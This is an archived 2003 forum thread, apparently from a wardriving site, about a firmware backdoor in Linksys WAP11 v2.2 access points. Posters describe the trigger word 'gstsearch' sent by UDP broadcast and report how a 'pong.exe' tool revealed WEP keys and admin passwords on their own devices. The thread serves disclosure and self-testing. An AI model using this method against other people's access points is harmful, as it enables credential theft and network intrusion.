WAP Backdoor

Configuration and operational information about stumbled AP's

WAP Backdoor

Postby sysadmn » Fri Jan 31, 2003 8:07 am

I stumbled across this on the Wardriving.Com blog. It's a couple of months old, but still (IMHO) newsworthy.

It seems that the OEM SW developer put a backdoor in their software. By sending the word "gstsearch" to a particular port, the WAP will reply with the WEP keys, mac filter settings, and admin password! It gets worse: this works from either the LAN or WAN interface! This definitely falls into the "WTF were they thinking?' category. Or did someone forget to #define before production release?

Nothing to worry about, unless your vendor bought this software. Anyone want to test the Linksys WAP11-V2.2?

http://archives.neohapsis.com/archives/bugtraq/2002-11/0008.html
Wigle Stats:
Total New Discovered Networks with GPS: 996
All Networks Recorded: 1,517
Networks This Month with GPS: 850
First Post: 26-Dec-2004
sysadmn
 
Posts: 124
Joined: Thu Jan 23, 2003 8:37 am
Location: in front of the computer, duh!

Postby sysadmn » Fri Jan 31, 2003 8:08 am

Sorry about the duplicate - @#$$#% back button!
Wigle Stats:
Total New Discovered Networks with GPS: 996
All Networks Recorded: 1,517
Networks This Month with GPS: 850
First Post: 26-Dec-2004
sysadmn
 
Posts: 124
Joined: Thu Jan 23, 2003 8:37 am
Location: in front of the computer, duh!

Postby Thorn » Fri Jan 31, 2003 11:14 am

It seems to me this was posted once before, - that C code looks awful familiar - but it may have been lost in the Great Crash of '02. I also seem to recall that immediately following this, there was a flurry of new Firmware issues from Linksys, DLink and the others.

Still it wouldn't hurt to check...

Thanks for bringing this up again, sysadmn.
Thorn
Stop the TSA now! Boycott the airlines.
Thorn
 
Posts: 10340
Joined: Sat Apr 13, 2002 3:00 am
Location: Villa Straylight

It's been posted before

Postby nashr » Fri Jan 31, 2003 11:25 am

You may be right about losing it in the "great crash". I actually have a binary of the exploit, but have not had any successful tests in the lab against systems available to us here. Has anyone actually tested this out?

Just found the original post at:

http://forums.netstumbler.com/showthread.php?s=&threadid=4791&highlight=pong
Help! I've been Simpsonized!
User avatar
nashr
 
Posts: 1585
Joined: Fri Aug 09, 2002 6:12 am
Location: Virginia

Postby MrEcho » Fri Jan 31, 2003 2:11 pm

Works on the WAP11 v2.2 fw: 1.01j
wow is that ever freaky.

It doesnt work on v2.6.
MrEcho
Mini Stumbler
 
Posts: 28
Joined: Sun Jan 19, 2003 6:12 am

Postby woodssc » Fri Jan 31, 2003 3:25 pm

How would a "non-programmer" type go about running this code against his access points? Thanks for any help. I have Intel 2011 and linksys wap11 2.2 .
woodssc
Mini Stumbler
 
Posts: 50
Joined: Mon Jul 08, 2002 3:35 pm

READ!

Postby nashr » Fri Jan 31, 2003 4:14 pm

Go to the forum link I posted above... you will find your answers there.
Help! I've been Simpsonized!
User avatar
nashr
 
Posts: 1585
Joined: Fri Aug 09, 2002 6:12 am
Location: Virginia

Postby woodssc » Fri Jan 31, 2003 4:25 pm

Holy crap. WEP Key and admin password on my WAP11 2.2 was displayed...
woodssc
Mini Stumbler
 
Posts: 50
Joined: Mon Jul 08, 2002 3:35 pm

Postby Madhadder » Sat Feb 01, 2003 5:32 am

Intresting program...

Just how does it work??

Does it scan the local IP subnet on a certain port looking
for a reply? If it does how is this going to work tring to get this
info. from the wireless side of a WEP'd AP, since you will need
an IP, and you can only get an IP if you already know the
WEP key?
User avatar
Madhadder
 
Posts: 1619
Joined: Sat Apr 13, 2002 5:37 am
Location: Munich, Germany

Postby MrEcho » Sat Feb 01, 2003 6:05 am

well if you look at the code it sends it to 255.255.255.255 via UDP.
Its like a network broadcast.
MrEcho
Mini Stumbler
 
Posts: 28
Joined: Sun Jan 19, 2003 6:12 am

Postby MRK » Sun Feb 02, 2003 10:36 am

Ok, i have a couple of questions.

1) I downloaded this program and ran it from my laptop (connected to my wap11). I just went to the command line and typed pong.exe and it displayed several fields, but no info. Does this mean i'm ok? Or that my firmware isnt affected?

2) How do i determine what version of wap11 i have? I think i have the 2.2. (Seeing as i bought it before the 2.6 was out... ithink) Is there a way of telling this by looking at the unit or looking at the online config? I havent been able to find it. Thanks!!

-Mr.K
MRK
 
Posts: 241
Joined: Sun Aug 25, 2002 12:31 pm

Postby MrEcho » Sun Feb 02, 2003 11:48 am

Look on the back...
MrEcho
Mini Stumbler
 
Posts: 28
Joined: Sun Jan 19, 2003 6:12 am

Postby MRK » Sun Feb 02, 2003 12:17 pm

I looked, but it wasnt there. Then i looked again, and i saw it in very small print. so... yea. lol. Thanks.

-Mr.K
MRK
 
Posts: 241
Joined: Sun Aug 25, 2002 12:31 pm

Postby MrEcho » Sun Feb 02, 2003 1:50 pm

Always read the fine print :)
MrEcho
Mini Stumbler
 
Posts: 28
Joined: Sun Jan 19, 2003 6:12 am

Postby Thorn » Mon Feb 03, 2003 9:35 am

Tested against a WAP 11 v1.1 (firmware version 1.4g8) and WAP11 v2.2 (firmware version 1.01j) this AM.

Non-Associated:
WAP11 v1.1
Results: Both versions of pong reported "no answer"

WAP11 v2.2
Results: Both versions of pong reported "no answer"

Associated:
WAP11 v1.1
Results: Both versions of pong reported "no answer"

WAP11 v2.2
Results: Using both the original version and v1.1 of pong.exe, I was not able to get anything particularly useful. There was some output, but most of the output appeared to be junk (i.e. non-printable characters.) However, part of the SSID did show in the "Admin Password" field of pong v1.1. Upon running v1.1 in the raw mode, the model, firmware version, WEP keys, SSID, and admin password were all displayed. I would suspect that the WAP11 has a slightly data layout, hence when it formated for output in either version of pong.exe, the data appears to be trashed. However, the vunerablity still exists, and once the layout of the raw data is known, it is very easy to determine what the are the values.

Conclusion:
Persons running a WAP11 v2.2 do have to worry about this exploit. However, WEP provides some protection as the data can only be extracted after the AP and the card have associated. If the WEP key is unknown, then association cannot take place.

Those persons running a WAP11 v2.2 without implementing WEP are the most vunerable to this exploit.
Thorn
Stop the TSA now! Boycott the airlines.
Thorn
 
Posts: 10340
Joined: Sat Apr 13, 2002 3:00 am
Location: Villa Straylight

Next

Return to AP Information

Who is online

Users browsing this forum: No registered users and 3 guests